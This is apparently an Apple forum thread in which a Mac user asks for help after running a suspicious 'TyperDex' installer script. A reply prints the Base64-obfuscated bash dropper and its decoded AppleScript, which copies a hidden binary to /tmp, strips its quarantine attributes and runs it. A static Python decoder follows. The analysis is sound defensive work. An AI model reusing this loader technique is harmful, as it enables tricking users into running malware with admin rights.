Downloaded a suspicious app. Please help

I use a Mac and I downloaded typerdex(.)org’s app. Came across the app through someone on Threads and they guided me to download and install the app, but it wasn’t the usual way of installing.

After opening the dmg file it said to move it to Terminal, and when I did that and pressed Enter it asked me to enter my Mac’s password. I did that and that was it. I don’t see any app installed. I’m scared that there might be something running in the background that I’m not aware of. The person who guided me has blocked me, so clearly there’s something going on. Is there any way I could find out if this is a virus or something and, if so, how can I get rid of it?


Appreciate the help!

MacBook Pro 16″, macOS 15.3

Posted on Mar 27, 2025 4:53 PM

Question marked as ⚠️ Top-ranking reply

Posted on Mar 27, 2025 7:33 PM

Not 100% sure it's malicious - but it is kind of sketchy at least. The file in the DMG you drag to the Terminal is a bash script:


#!/bin/bash

FXhoRLqY='IyEvYmluL2Jhc2gKb3Nhc2NyaXB0IC1lICdvbiBydW4KICAgIHRyeQogICAgICAgIHNldCBkaXNrTGlzdCB0byBsaXN0IGRpc2'
xUraPryk='tzCiAgICBlbmQgdHJ5C'
AgQMGPxf='iAgICBzZXQgdGFyZ2V0RGlzayB'
opxHSyoX='0byAiIgo'
jGEGUGmb='gICAgdHJ5CiAgICAgICAgcmVwZWF0'
YUEtjAJr='IHdpdGggZGlzayBpbiBkaXNrTGlzdAogICAgICAgICAgICBpZiBkaXNrIGNvbnRhaW5'
KXIkWjgK='zICJUeXBlckRleFNldHVwIiB0aGVuCiAgICAgICAgICAgICAgICBzZXQgdGFyZ2V0RGlzayB0byBkaXNrCiAg'
zzyRgDka='ICAgICAgICAgICAgIC'
FuDnOzWd='BleGl0IHJlcGVhdAogICAgICAgICAgICB'
SlewqVcl='lbmQgaWYKICAgICA'
iKttHYHF='gICBlbmQgcmVwZWF0CiAgICBlbmQgdHJ5C'
XGPSUmcU='iAgICBpZiB0YXJnZXREaXNrIGlzICIiIHRoZW4KICAgICAgICByZXR1cm4KICAgIGVuZCBpZgogICAgc2V0IGZvbGRlclB'
jdRZzsIY='hdGggdG8gIi9Wb2x1bWVzLyIgJiB0YXJnZXREaXNrICYgIi8iCiAgICBzZXQgYXBwTmFtZSB0'
XOnrPYmo='byAiLlR5cGVyRGV4U2V0dXAiCiAgICBzZXQgYXBwUGF0aCB0byBmb2xkZXJQYXRoICYgYXBwTmFtZQogICAgc2V0IHRlbXBBcHBQ'
ZipdVIwQ='YXRoIHRvIC'
qNraIQCR='IvdG1wLyIgJiBh'
HzfKDDyz='cHBOYW1lCiAgICB0'
XnOxbqKW='cnkKICAgICAgICBkbyBzaGVsbCBzY3JpcHQgInJtIC1mICIgJiBxdW90ZWQgZm9ybSBvZiB0ZW1wQXBwUGF0aAogICAgZW5kIHRyeQogICAgdHJ5CiAgICAgICA'
FKGSwYHi='gZG8gc2hlbGwgc2NyaXB0ICJjcCAiICYgcXVvdGVkIGZvcm0gb2YgYXBwUGF0aCAmICIgIiA'
pMpKcAEb='mIHF1b3RlZCBmb3JtIG9mIHRlbXBBcHBQYXRoCiAgICBlbmQgdHJ5CiAgICB0cnkKICAgICAgICBkbyBzaGVsbCBzY3JpcHQgInhhdHR'
VLfddcEb='yIC1jICIgJiBxdW90ZWQgZm9ybSBvZiB'
plNENAmz='0Z'
nlUYhzhZ='W1wQXBwUGF0aAogICAgZW5kIHRyeQogICAgdHJ5CiAgICAgICAgZG8gc2hlbGwgc2NyaXB0ICJ'
PwjdatGl='jaG1vZCAreCAiICYgcXVvdGVkIGZvcm0gb2YgdGVtcEFwcFBhdGgKICAgIGVuZCB0cnkKICAgIHRyeQogICAgICAgIGRvIHNoZWxsIHNjcmlwdCBxdW90ZWQgZm9ybSBvZiB0ZW1wQXB'
JhDsfXxD='wUGF0aAogICAgZW5kIHRyeQplbmQgcnVuJw=='
code="${FXhoRLqY}${xUraPryk}${AgQMGPxf}${opxHSyoX}${jGEGUGmb}${YUEtjAJr}${KXIkWjgK}${zzyRgDka}${FuDnOzWd}${SlewqVcl}${iKttHYHF}${XGPSUmcU}${jdRZzsIY}${XOnrPYmo}${ZipdVIwQ}${qNraIQCR}${HzfKDDyz}${XnOxbqKW}${FKGSwYHi}${pMpKcAEb}${VLfddcEb}${plNENAmz}${nlUYhzhZ}${PwjdatGl}${JhDsfXxD}"

bash -c "$(echo "$code" | base64 --decode)"


The unreadable part in the middle seems to be Base64 encoded:


#!/bin/bash
osascript -e 'on run
    try
        set diskList to list disks
    end try
    set targetDisk to ""
    try
        repeat with disk in diskList
            if disk contains "TyperDexSetup" then
                set targetDisk to disk
                exit repeat
            end if
        end repeat
    end try
    if targetDisk is "" then
        return
    end if
    set folderPath to "/Volumes/" & targetDisk & "/"
    set appName to ".TyperDexSetup"
    set appPath to folderPath & appName
    set tempAppPath to "/tmp/" & appName
    try
        do shell script "rm -f " & quoted form of tempAppPath
    end try
    try
        do shell script "cp " & quoted form of appPath & " " & quoted form of tempAppPath
    end try
    try
        do shell script "xattr -c " & quoted form of tempAppPath
    end try
    try
        do shell script "chmod +x " & quoted form of tempAppPath
    end try
    try
        do shell script quoted form of tempAppPath
    end try
end run'


At a minimum, it seems to be copying an app named ".TyperDexSetup" into /tmp, making it executable and then running it. ".TyperDexSetup" is a 12 MB binary encoded file.


It's probably malware. Not 100%, but super sketchy. And whatever that binary did, it did with your administrator privilege level - so in theory anything...
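
The decoding step shown in this reply can be done statically, so the script is only read as text and never run. The following is an added example, not part of the original reply: `decode_dropper`, `findings`, `build_sample` and the indicator labels are hypothetical names, and the sample script is constructed to match the shape of the posted one.

```python
import base64
import re
import sys

ASSIGN = re.compile(r"^(\w+)=(['\"])(.*)\2\s*$")
REF = re.compile(r"\$\{(\w+)\}")
DECODED_VAR = re.compile(r'echo\s+"\$\{?(\w+)\}?"\s*\|\s*base64\s+(?:--decode|-d|-D)\b')

# Heuristics (assumed labels) for the behaviours seen in the decoded script above.
INDICATORS = {
    "runs AppleScript via osascript": r"\bosascript\b",
    "clears extended attributes (incl. quarantine)": r"\bxattr\s+-c\b",
    "marks a file executable": r"\bchmod\s+\+x\b",
    "stages a file under /tmp": r"/tmp/",
}

def decode_dropper(script: str) -> str:
    """Rebuild and decode the Base64 payload as text; nothing is executed."""
    variables = {}
    for line in script.splitlines():
        m = ASSIGN.match(line.strip())
        if not m:
            continue
        name, quote, value = m.groups()
        if quote == '"':  # double-quoted: expand ${VAR} from earlier assignments
            value = REF.sub(lambda r: variables.get(r.group(1), ""), value)
        variables[name] = value
    m = DECODED_VAR.search(script)  # the variable piped into `base64 --decode`
    if not m or m.group(1) not in variables:
        raise ValueError("no Base64-decoded variable found")
    raw = base64.b64decode(variables[m.group(1)], validate=True)
    return raw.decode("utf-8", "replace")

def findings(payload: str) -> list[str]:
    return [label for label, rx in INDICATORS.items() if re.search(rx, payload)]

def build_sample() -> str:
    """Constructed sample in the same shape as the posted script (not the real one)."""
    payload = ("#!/bin/bash\ncp /Volumes/ExampleSetup/.ExampleSetup /tmp/.ExampleSetup\n"
               "xattr -c /tmp/.ExampleSetup\nchmod +x /tmp/.ExampleSetup\n")
    b64 = base64.b64encode(payload.encode()).decode()
    chunks = [b64[i:i + 24] for i in range(0, len(b64), 24)]
    lines = ["#!/bin/bash"] + [f"v{i}='{c}'" for i, c in enumerate(chunks)]
    lines.append('code="' + "".join(f"${{v{i}}}" for i in range(len(chunks))) + '"')
    lines.append('bash -c "$(echo "$code" | base64 --decode)"')
    return "\n".join(lines)

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else build_sample()
    decoded = decode_dropper(text)
    print(decoded, *("[!] " + f for f in findings(decoded)), sep="\n")
```

Given a file path as its argument, it decodes a saved copy of a script instead of the built-in sample.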
